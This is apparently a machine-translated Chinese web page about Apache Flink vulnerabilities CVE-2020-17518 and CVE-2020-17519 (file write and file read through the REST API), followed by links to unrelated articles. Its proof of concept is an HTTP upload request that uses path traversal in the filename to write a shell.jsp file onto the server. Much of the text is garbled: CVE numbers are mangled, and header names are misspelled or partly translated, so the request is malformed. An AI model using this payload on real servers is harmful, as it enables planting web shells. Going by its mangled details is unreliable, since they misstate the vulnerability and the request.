Apache Flink POC漏洞示例分析CVE-2020-17518/17519

技术Apache Flink POC漏洞CVE-2020-17518/17519的示例分析今天就跟大家聊聊有关 Apache Flink POC漏洞CVE-2020-17518/17519的示例分析,可能很多人都不太了解

今天跟大家聊聊Apache Flink POC漏洞CVE-2020-17518/17519的实例分析,可能很多人不太了解。为了让大家更好的了解,边肖为大家总结了以下内容,希望大家能从这篇文章中有所收获。

CVE-2020-175183360文件写入

使用REST API,攻击者可以修改HTTP头并将上传的文件写入本地文件系统的任何位置(Flink 1.5.1进程可以访问)

CVE-2020-175193360文件读取

Apache Flink 1.11.0允许攻击者通过JobManager进程的REST API读取JobManager本地文件系统上的任何文件(可由JobManager进程访问)。

概念验证:

POST/jars/upload HTTP/1.1host : IP :8081 Accept-encoging : gzip,pinaceaccept : */* Accept-language : enUser-agent : Mozilla/5.0(Windows NT 10.0;Win64x64)applebwebkit/537.36(KHTML,像Gecko)Chrome/87 . 0 . 4280 . 88 Safari/537.36 connection : closeContent-type : multipart/form-data;boundary=-webkitformboundaryoz89r 6 ycontent-length : 189-webkitformboundaryoz8mknrrs89r 6 ycontent-disposition :表单-数据;name=' jarfile文件名='././././././etc/shell . JSP ' success-webkitformboundaryoz8 meknrso 89 r6y-

看完以上内容,你对Apache Flink POC漏洞CVE-2020-17518/17519的样本分析有更好的理解吗?如果您想了解更多知识或相关内容,请关注行业资讯频道,感谢您的支持。

内容来源网络,如有侵权,联系删除,本文地址:https://www.230890.com/zhan/155656.html

(0)

相关推荐

  • javascript 中string是不是对象

    技术javascript 中string是不是对象这篇文章主要介绍了javascript 中string是不是对象,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解

    攻略 2021年11月18日
  • 黑曼巴英文,用英文介绍科比的黑曼巴精神

    技术黑曼巴英文,用英文介绍科比的黑曼巴精神曼巴精神focused on being in the momentMamba mentality is aconstantquest
    to find answers
    曼巴精神是

    生活 2021年10月28日
  • 租用美国服务器建站的5个注意点美国服务器

    技术租用美国服务器建站的5个注意点美国服务器虽然在租用美国服务器的时候,不同的网站需要的配置也不一样,但是无论有什么特殊需求,每个网站所有者都应该在美国服务器租用中坚持五件事。 1. 高水平的正常运行时间 对于以提供内容

    礼包 2021年10月20日
  • JDK7与JDK8中HashMap的实现是怎样的

    技术JDK7与JDK8中HashMap的实现是怎样的本篇文章为大家展示了JDK7与JDK8中HashMap的实现是怎样的,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。JDK7中的

    攻略 2021年11月16日
  • Oracle 11gR2中的STANDBY_MAX_DATA_DELAY

    技术Oracle 11gR2中的STANDBY_MAX_DATA_DELAYOracle 11gR2中的STANDBY_MAX_DATA_DELAY,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想

    攻略 2021年11月29日
  • 如何构建一个自己的Base Image 镜像

    技术如何构建一个自己的Base Image 镜像如何构建一个自己的Base Image 镜像,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。m

    攻略 2021年10月19日